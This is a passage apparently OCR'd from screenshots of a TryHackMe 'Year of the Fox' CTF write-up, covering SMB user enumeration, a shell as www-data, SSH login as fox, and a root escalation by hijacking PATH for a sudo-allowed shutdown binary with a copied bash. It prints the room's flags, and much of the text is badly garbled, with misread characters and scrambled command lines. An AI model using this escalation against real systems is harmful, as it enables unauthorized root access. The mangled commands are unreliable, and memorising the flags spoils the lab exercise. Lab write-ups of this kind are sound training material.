tryhackme

View on GitHub

Year of the fox

12 June 2022 11:24 AM

NetBIOS computer name: YEAR-OF-THE-FOX\xØØ Domain name: Ian FQDN: year-of-the-fox. Ian System time:

PORT STATE SERVICE 139/tcp open netbios-ssn Host script results: I smb-os-discovery: OS: Windows 6.1 (samba 4.7.6-Ubuntu) Computer name: year-of-the-fox NetBIOS computer name: YEAR-OF-THE-FOX\XØO Domain name: Ian FQDN: year-of-the-fox. Ian system time:

[+] Enumerating users using SID S-1-22-1 and logon u s-1-22-1-1øøø Unix user\fox (Local user) S-1-22-1-1001 Unix User\rascal (Local User)

RISCAL' S SEARCH SOMfiHlNL? SEARCH! No

III

umw-dataöyear-of-the-fox:/var/mw$ Is -la total 20 drwxr-xr-x 4 root root 4096 May 31 2020 . drwxr-xr-x 13 root root 4096 May 30 2020 . drwxr-xr-x 2 root root 4096 May 31 2020 files drwxr-xr-x 3 root root 4096 May 31 2020 html 38 May 31 2020 web-flag.txt 1 root root -rw-r r -- w.w-dataöyear-of-the-fox:/var/wwn$ cat web-flag. txt THM{Nzg2ZWQwYWUwN2UwOTU3NDY5ZjVmYTYw} vw.w-da taayear-of-the-fox:/var/w.w$

Active Ports ht tps : // book. hackt ri cks. xyz/ I inux-hardeni ng/pri vi ege-esca Za t ionvopen-ports tcp C) moo: 139 tcp : 53 tcp tcp 0:445 tcp6 - 139 tcp6 80 - 445 tcp6 0.0. o.o.ø. 0.0. o.ø.ø. LISTEN LISTEN LISTEN LISTEN LISTEN LISTEN LISTEN Can I sniff with tcpdump?

cat ssh_config This is the ssh client system-wide configuration file. See ssh_config(5) for more information. This file provides defaults for users, and the values can be changed in per-user configuration files or on the command line. configuration data is parsed as follows: 1. command line options 2. user-specific file 3. system-wide file Any configuration value is only changed the first time it is set. Thus, host-specific definitions should be at the beginning of the configuration file, and defaults at the end. Site-wide defaults for some commonly used options. For a comprehensive list of available options, their meanings and defaults, please see the ssh_config(5) man page.

# Example of overriding settings on a per-user basis t$Match User anoncvs X11Forwarding no AllowTcpForwarding no Permit TTY no ForceCommand cvs server AllowUsers fox 1 : /etc/ssh$

kaliS kali)- ssh foxmø. 10.198.1 2222 —p The authenticity of host '[10.10.198.1]: 2222 ([10.10.198.1] :2222)' can't be established. ED25519 key fingerprint is SHA256:ytuC6e5+2EwnZLeockeugHFQMcm1RWIKFJR/MF8JPJ0. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes warning: permanently added '[10.10.198.1]: 2222 ' foxmø.1ø.198.1's password: (ED25519) to the list of known hosts. foxayear-of-the- fox : user-flag.txt samba foxayear-of-the- fox : —$ cat user -flag. txt THM{Njg3NWZhNDBjMmNIMzNkMGZmMDBhYjhk} foxövear-of-the- fox : —$

sudo -l Matching Defaults entries for fox on year-of-the-fox: env_reset, mail_badpass User fox may run the following commands on year-of-the-fox: (root) NOPASSWD: /usr/sbin/shutdown 1

foxayear-of-the-fox : /tmp$ foxayear-of -the-fox : /tmp$ system( " poweroff" ) ; return; > > power foxayear-of -the-fox : /tmp$ void main() { system( poweroff); return; foxayear-of -the-fox : /tmp$ foxayear-of -the- fox : /tmp$ foxayear-of-the- fox : /tmp$ foxä)year-of-the- fox : /tmp$ foxayear-of -the- fox : /tmp$ touch power echo "void main() { cat power cp /bin/bash /tmp/poweroff cp /bin/bash /tmp/power chmod /tmp/power export sudo /usr/sbin/shutdown rootayear-of-the-fox : /tmp# id uid=ø(root) gid=ø(root) groups=ø(root)

a0274786e2a627078666d6467797046666766683b693232353a6968303